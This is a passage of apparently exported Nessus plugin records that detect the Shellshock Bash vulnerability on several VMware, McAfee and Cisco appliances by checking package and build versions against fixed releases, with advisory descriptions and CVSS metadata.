script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_operations\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"suse_11_bash-140926.nasl\");\n script_require_keys(\"Host/VMware vCenter Operations Manager/Version\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/local_checks_enabled\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\n# Check if general SuSE check already ran\nif (get_kb_item(\"Success/77958\")) exit(0, \"Plugin #77958 already found that bash needs to be updated.\");\n\napp = \"VMware vCenter Operations Manager\";\nvuln = FALSE;\n\n# local checks are required\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\n# Check that the host is SUSE\nos = get_kb_item_or_exit(\"Host/SuSE/release\");\nif (os !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE\");\n\n# rpm list is required\nget_kb_item_or_exit(\"Host/SuSE/rpm-list\");\n\n# Make sure this is an affected version of vCOPs\n# According to the advisory, vCOPS 5.x is vulnerable\n# Software downloads and patches are only available\n# for 5.7 and 5.8. 
We're checking for those specifically\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Operations Manager/Version\");\nif (version !~ \"^5\\.[78]\\.\") audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\n# Perform RPM checks\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-32bit-5.2-147.22.1\")) vuln = TRUE;\n\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\\n' + 'The remote ' + app + ' appliance has one or more outdated packages :' +\n '\\n';\n security_hole(port:0, extra:report+rpm_report_get());\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected because the packages are 
up-to-date\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:58", "description": "The version of VMware NSX installed on the remote host is 4.x prior to 4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:nsx"], "id": "VMWARE_NSX_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78826", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78826);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2022/07/28\");\n\n script_name(english:\"VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware NSX installed on the remote host is 4.x prior to\n4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore,\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/blogs/766093/posts/1976383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware NSX version 4.0.5 / 4.1.4 / 4.2.1 / 6.0.7 / 6.1.1 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:nsx\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_nsx_installed.nbin\");\n script_require_keys(\"Host/VMware NSX/Product\", \"Host/VMware NSX/Version\", \"Host/VMware NSX/Build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nproduct = get_kb_item_or_exit(\"Host/VMware NSX/Product\");\nversion = get_kb_item_or_exit(\"Host/VMware NSX/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware NSX/Build\");\nproduct_name = \"VMware NSX \" + product;\n\nfix = '';\n\nif (version =~ '^4\\\\.0\\\\.' && int(build) < '39236') fix = '4.0.5 Build 39236';\nelse if (version =~ '^4\\\\.1\\\\.' && int(build) < '39250') fix = '4.1.4 Build 39250';\nelse if (version =~ '^4\\\\.2\\\\.' && int(build) < '39256') fix = '4.2.1 Build 39256';\nelse if (version =~ '^6\\\\.0\\\\.' 
&& int(build) < '2176282') fix = '6.0.7 Build 2176282';\nelse if (version =~ '^6\\\\.1\\\\.' && int(build) < '2179522') fix = '6.1.1 Build 2179522';\nelse audit(AUDIT_INST_VER_NOT_VULN, product_name, version, build);\n\nreport =\n '\\n Installed product : ' + product_name +\n '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fix + \n '\\n';\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:23", "description": "The remote host has a version of McAfee Email Gateway (MEG) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-11T00:00:00", "type": "nessus", "title": "McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:email_gateway"], "id": "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79123", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79123);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", 
value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Email Gateway (MEG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:email_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_email_gateway_version.nbin\");\n script_require_keys(\"Host/McAfeeSMG/name\", \"Host/McAfeeSMG/version\", \"Host/McAfeeSMG/patches\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = get_kb_item_or_exit(\"Host/McAfeeSMG/name\");\nversion = get_kb_item_or_exit(\"Host/McAfeeSMG/version\");\npatches = get_kb_item_or_exit(\"Host/McAfeeSMG/patches\");\n\n# Determine fix.\nif (version =~ \"^5\\.6\\.\")\n{\n fix = \"5.6.2964.108\";\n hotfix = \"5.6h1010267\";\n}\nelse if (version =~ \"^7\\.0\\.\")\n{\n fix = \"7.0.2934.111\";\n hotfix = \"7.0.5h1010264\";\n}\nelse if (version =~ \"^7\\.5\\.\")\n{\n fix = \"7.5.3088.112\";\n hotfix = \"7.5.4h1010253\";\n}\nelse if (version =~ \"^7\\.6\\.\")\n{\n fix = \"7.6.3044.119\";\n hotfix = \"7.6.2h1010246\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == 
-1 && hotfix >!< patches)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = '\\n' + app_name + ' ' + version + ' is missing patch ' + hotfix + '.\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port:port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix, app_name, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:24", "description": "According to its self-reported version number, the remote Cisco TelePresence Conductor device is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nNote that an attacker must be authenticated before the device is exposed to this exploit.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-26T00:00:00", "type": "nessus", "title": "Cisco TelePresence Conductor Bash Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_conductor"], "id": "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "href": "https://www.tenable.com/plugins/nessus/79584", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79584);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 
70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02103\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco TelePresence Conductor Bash Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Cisco TelePresence Conductor device is affected by a\ncommand injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, remote Cisco\nTelePresence Conductor device is affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. 
This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\n\nNote that an attacker must be authenticated before the device is\nexposed to this exploit.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02103\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.1 / 2.4.1 / 3.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_conductor\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_telepresence_conductor_detect.nbin\");\n script_require_keys(\"Host/Cisco_TelePresence_Conductor/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Conductor\";\nversion = get_kb_item_or_exit(\"Host/Cisco_TelePresence_Conductor/Version\");\n\nif (\n version =~ \"^1(\\.|$)\" ||\n (version =~ \"^2\\.(0|1|2)(\\.|$)\") ||\n (version =~ \"^2\\.3(\\.|$)\" && ver_compare(ver:version, fix:\"2.3.1\", strict:FALSE) < 0) ||\n (version =~ \"^2\\.4(\\.|$)\" && ver_compare(ver:version, fix:\"2.4.1\", strict:FALSE) < 0)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 2.3.1 / 2.4.1 / 3.0' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:32", "description": "The version of VMware Workspace Portal (formerly known as VMware Horizon Workspace) installed on the remote host is missing package updates. It is, therefore, affected by the following vulnerabilities in the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. By sending a specially crafted request to a CGI script that passes environment variables, a remote, unauthenticated attacker can execute arbitrary code on the host. (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169)\n\n - An out-of-bounds memory access error exists due to improper redirection implementation in the 'parse.y' source file. A remote attacker can exploit this issue to cause a denial of service or potentially execute arbitrary code. (CVE-2014-7186)\n\n - An off-by-one error exists in the 'read_token_word' function in the 'parse.y' source file. A remote attacker can exploit this issue to cause a denial of service or potentially execute arbitrary code. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2014-11-04T00:00:00", "type": "nessus", "title": "VMware Workspace Portal Multiple Bash Shell Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["x-cpe:/a:vmware:vmware_horizon_workspace", "x-cpe:/a:vmware:vmware_workspace_portal"], "id": "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78857);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", 
value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware Workspace Portal Multiple Bash Shell Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a device management application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workspace Portal (formerly known as VMware\nHorizon Workspace) installed on the remote host is missing package\nupdates. It is, therefore, affected by the following vulnerabilities\nin the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock, which is due to the processing of\n trailing strings after function definitions in the\n values of environment variables. This allows a remote\n attacker to execute arbitrary code via environment\n variable manipulation depending on the configuration of\n the system. By sending a specially crafted request to a\n CGI script that passes environment variables, a remote,\n unauthenticated attacker can execute arbitrary code on\n the host. (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278,\n CVE-2014-7169)\n\n - An out-of-bounds memory access error exists due to\n improper redirection implementation in the 'parse.y'\n source file. A remote attacker can exploit this issue\n to cause a denial of service or potentially execute\n arbitrary code. (CVE-2014-7186)\n\n - An off-by-one error exists in the 'read_token_word'\n function in the 'parse.y' source file. A remote attacker\n can exploit this issue to cause a denial of service or\n potentially execute arbitrary code. 
(CVE-2014-7187)\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2091067\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52af41d9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch as stated in the 2091067 VMware KB advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vmware_horizon_workspace\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vmware_workspace_portal\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"suse_11_bash-140926.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n script_require_ports(\"Host/VMware Horizon Workspace/Version\", \"Host/VMware Workspace Portal/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\n# Check if general SuSE check already ran\nif (get_kb_item(\"Success/77958\")) exit(0, \"Plugin #77958 already found that bash needs to be updated.\");\n\n# Check that the OS is SuSE\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\napp = NULL;\nversion = NULL;\n\nversion = get_kb_item(\"Host/VMware Horizon Workspace/Version\");\nif (!isnull(version))\n{\n app = \"VMware Horizon Workspace\";\n}\nelse\n{\n version = get_kb_item(\"Host/VMware Workspace Portal/Version\");\n app = \"VMware Workspace Portal\";\n}\n\nif (isnull(version)) audit(AUDIT_NOT_INST, \"VMware Horizon Workspace / VMware Workspace Portal\");\n\n# 